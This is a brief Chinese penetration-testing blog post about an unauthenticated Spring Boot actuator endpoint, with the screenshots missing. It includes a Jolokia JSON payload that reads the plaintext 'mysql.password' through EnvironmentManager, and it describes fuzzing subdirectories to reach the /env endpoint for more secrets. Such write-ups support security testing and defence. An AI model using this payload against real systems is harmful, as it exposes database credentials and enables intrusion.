测试发现spring boot actuator接口未授权访问:

【实战】简单的API接口FUZZ小案例

 

之前写过用mat工具获取加密数据的明文,下面尝试通过jolokia接口获取明文数据:

payload:

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["mysql.password"]}

【实战】简单的API接口FUZZ小案例

 

开始正题,发现这种二极目录下的spring boot actuator接口未授权后,可以尝试针对其他二极目录进行访问尝试,或者直接fuzz二级目录接口,fuzz如下:

【实战】简单的API接口FUZZ小案例

 

fuzz出一个二级目录,查看env接口:

【实战】简单的API接口FUZZ小案例

 

这样一来我们就可以获取更多的加密数据的信息。

 

相关文章:

  • 2021-11-20
  • 2022-12-23
  • 2022-01-22
  • 2021-10-07
  • 2021-06-09
  • 2021-12-17
  • 2021-08-18
  • 2021-09-08
猜你喜欢
  • 2021-09-02
  • 2021-06-16
  • 2021-08-03
  • 2021-08-06
  • 2021-12-24
  • 2021-11-03
  • 2022-01-17
相关资源
相似解决方案